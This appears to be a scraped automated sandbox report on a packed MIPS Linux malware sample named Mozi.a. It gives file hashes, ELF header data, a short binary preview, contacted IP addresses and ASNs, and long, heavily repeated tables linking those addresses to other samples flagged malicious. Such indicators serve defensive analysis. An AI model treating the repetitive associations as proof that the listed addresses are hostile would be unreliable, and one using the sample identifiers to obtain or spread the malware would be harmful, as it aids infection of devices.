                                                        hZt4RvNpGTGet hashmaliciousBrowse
                                                          nCEHDEKsvvGet hashmaliciousBrowse
                                                            91.189.91.43ggbMKQDdG2Get hashmaliciousBrowse
                                                              SecuriteInfo.com.Linux.Siggen.4218.31606.9155Get hashmaliciousBrowse
                                                                AbriuSDkeLGet hashmaliciousBrowse
                                                                  xjmPNreY8IGet hashmaliciousBrowse
                                                                    u7kjf23xQcGet hashmaliciousBrowse
                                                                      nrT4coM180Get hashmaliciousBrowse
                                                                        Fy8SpcfH79Get hashmaliciousBrowse
                                                                          6vqWv6BFhRGet hashmaliciousBrowse
                                                                            WaH4Q4OTzDGet hashmaliciousBrowse
                                                                              6s4RqypN8pGet hashmaliciousBrowse
                                                                                0vknf5ybYdGet hashmaliciousBrowse
                                                                                  sddX6YllruGet hashmaliciousBrowse
                                                                                    8NC2CO6W0BGet hashmaliciousBrowse
                                                                                      nEzZe0JYXLGet hashmaliciousBrowse
                                                                                        D3xbHFJTICGet hashmaliciousBrowse
                                                                                          ivgMZPUOLxGet hashmaliciousBrowse
                                                                                            5VWtwrKOJbGet hashmaliciousBrowse
                                                                                              Bs5fIqZapqGet hashmaliciousBrowse
                                                                                                hZt4RvNpGTGet hashmaliciousBrowse
                                                                                                  nCEHDEKsvvGet hashmaliciousBrowse
                                                                                                    91.189.91.42ggbMKQDdG2Get hashmaliciousBrowse
                                                                                                      SecuriteInfo.com.Linux.Siggen.4218.31606.9155Get hashmaliciousBrowse
                                                                                                        AbriuSDkeLGet hashmaliciousBrowse
                                                                                                          xjmPNreY8IGet hashmaliciousBrowse
                                                                                                            u7kjf23xQcGet hashmaliciousBrowse
                                                                                                              nrT4coM180Get hashmaliciousBrowse
                                                                                                                Fy8SpcfH79Get hashmaliciousBrowse
                                                                                                                  6vqWv6BFhRGet hashmaliciousBrowse
                                                                                                                    WaH4Q4OTzDGet hashmaliciousBrowse
                                                                                                                      6s4RqypN8pGet hashmaliciousBrowse
                                                                                                                        0vknf5ybYdGet hashmaliciousBrowse
                                                                                                                          sddX6YllruGet hashmaliciousBrowse
                                                                                                                            8NC2CO6W0BGet hashmaliciousBrowse
                                                                                                                              nEzZe0JYXLGet hashmaliciousBrowse
                                                                                                                                D3xbHFJTICGet hashmaliciousBrowse
                                                                                                                                  ivgMZPUOLxGet hashmaliciousBrowse
                                                                                                                                    5VWtwrKOJbGet hashmaliciousBrowse
                                                                                                                                      Bs5fIqZapqGet hashmaliciousBrowse
                                                                                                                                        hZt4RvNpGTGet hashmaliciousBrowse
                                                                                                                                          nCEHDEKsvvGet hashmaliciousBrowse

                                                                                                                                            Domains

                                                                                                                                            No context

                                                                                                                                            ASN

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                            CANONICAL-ASGBggbMKQDdG2Get hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            SecuriteInfo.com.Linux.Siggen.4218.31606.9155Get hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            AbriuSDkeLGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            xjmPNreY8IGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            u7kjf23xQcGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            nrT4coM180Get hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            Fy8SpcfH79Get hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            6vqWv6BFhRGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            WaH4Q4OTzDGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            6s4RqypN8pGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            0vknf5ybYdGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            sddX6YllruGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            8NC2CO6W0BGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            nEzZe0JYXLGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            D3xbHFJTICGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            ivgMZPUOLxGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            5VWtwrKOJbGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            Bs5fIqZapqGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            hZt4RvNpGTGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            nCEHDEKsvvGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            CANONICAL-ASGBggbMKQDdG2Get hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            SecuriteInfo.com.Linux.Siggen.4218.31606.9155Get hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            AbriuSDkeLGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            xjmPNreY8IGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            u7kjf23xQcGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            nrT4coM180Get hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            Fy8SpcfH79Get hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            6vqWv6BFhRGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            WaH4Q4OTzDGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            6s4RqypN8pGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            0vknf5ybYdGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            sddX6YllruGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            8NC2CO6W0BGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            nEzZe0JYXLGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            D3xbHFJTICGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            ivgMZPUOLxGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            5VWtwrKOJbGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            Bs5fIqZapqGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            hZt4RvNpGTGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            nCEHDEKsvvGet hashmaliciousBrowse
                                                                                                                                            • 91.189.91.42
                                                                                                                                            INIT7CHggbMKQDdG2Get hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            SecuriteInfo.com.Linux.Siggen.4218.31606.9155Get hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            AbriuSDkeLGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            xjmPNreY8IGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            u7kjf23xQcGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            nrT4coM180Get hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            Fy8SpcfH79Get hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            6vqWv6BFhRGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            WaH4Q4OTzDGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            6s4RqypN8pGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            0vknf5ybYdGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            sddX6YllruGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            8NC2CO6W0BGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            nEzZe0JYXLGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            D3xbHFJTICGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            ivgMZPUOLxGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            5VWtwrKOJbGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            Bs5fIqZapqGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            hZt4RvNpGTGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202
                                                                                                                                            nCEHDEKsvvGet hashmaliciousBrowse
                                                                                                                                            • 109.202.202.202

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            No context

                                                                                                                                            Dropped Files

                                                                                                                                            No context

                                                                                                                                            Created / dropped Files

                                                                                                                                            No created / dropped files found

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                                                                                                            Entropy (8bit):6.016914162546184
                                                                                                                                            TrID:
                                                                                                                                            • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                                                                                            • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                                                                                            File name:Mozi.a
                                                                                                                                            File size:307960
                                                                                                                                            MD5:e30a81d66f18f07647397d1defbad11b
                                                                                                                                            SHA1:a7fd1a1d71f7f7b00886741db52c42af0c8873f1
                                                                                                                                            SHA256:b7ba5aa2f8f7781d408e87b2131fa2cc9b95cdf3460f9778229398c9e851772a
                                                                                                                                            SHA512:df7b274ac394ca1192019d35212b076d645e095050930a42342d32d7937b37a7981c19029ecb54d9390bd8a9ba91fb137d52e89b176891ac05809daa1a28b766
                                                                                                                                            SSDEEP:6144:7O/QJHZweEL/NOjCHm7FZZncaoNsKqqfPqOJ:78QpZsKCaiaHKqoPqOJ
                                                                                                                                            File Content Preview:.ELF.....................A.h...4.........4. ...(.............@...@...........................C...C...................*.*UPX!.X.....................\....|.$..ELF..........@.`....4..^h... ...(......<...@......ll.....H.W.`.t.d....dt.Q.....].M............6...

                                                                                                                                            Static ELF Info

                                                                                                                                            ELF header

                                                                                                                                            Class:ELF32
                                                                                                                                            Data:2's complement, big endian
                                                                                                                                            Version:1 (current)
                                                                                                                                            Machine:MIPS R3000
                                                                                                                                            Version Number:0x1
                                                                                                                                            Type:EXEC (Executable file)
                                                                                                                                            OS/ABI:UNIX - System V
                                                                                                                                            ABI Version:0
                                                                                                                                            Entry Point Address:0x41fb68
                                                                                                                                            Flags:0x1007
                                                                                                                                            ELF Header Size:52
                                                                                                                                            Program Header Offset:52
                                                                                                                                            Program Header Size:32
                                                                                                                                            Number of Program Headers:2
                                                                                                                                            Section Header Offset:0
                                                                                                                                            Section Header Size:40
                                                                                                                                            Number of Section Headers:0
                                                                                                                                            Header String Table Index:0

                                                                                                                                            Program Segments

                                                                                                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                                                            LOAD0x00x4000000x4000000x205b20x205b24.42980x5R E0x10000
                                                                                                                                            LOAD0x00x4300000x4300000x00x8ac180.00000x6RW 0x10000

                                                                                                                                            Network Behavior

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Oct 28, 2021 06:47:14.772008896 CEST42836443192.168.2.2391.189.91.43
                                                                                                                                            Oct 28, 2021 06:47:15.540019989 CEST4251680192.168.2.23109.202.202.202
                                                                                                                                            Oct 28, 2021 06:47:29.876302958 CEST43928443192.168.2.2391.189.91.42
                                                                                                                                            Oct 28, 2021 06:47:42.164449930 CEST42836443192.168.2.2391.189.91.43
                                                                                                                                            Oct 28, 2021 06:47:46.260524988 CEST4251680192.168.2.23109.202.202.202
                                                                                                                                            Oct 28, 2021 06:48:10.836944103 CEST43928443192.168.2.2391.189.91.42

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Start time:06:47:10
                                                                                                                                            Start date:28/10/2021
                                                                                                                                            Path:/tmp/Mozi.a
                                                                                                                                            Arguments:/tmp/Mozi.a
                                                                                                                                            File size:5777432 bytes
                                                                                                                                            MD5 hash:0083f1f0e77be34ad27f849842bbb00c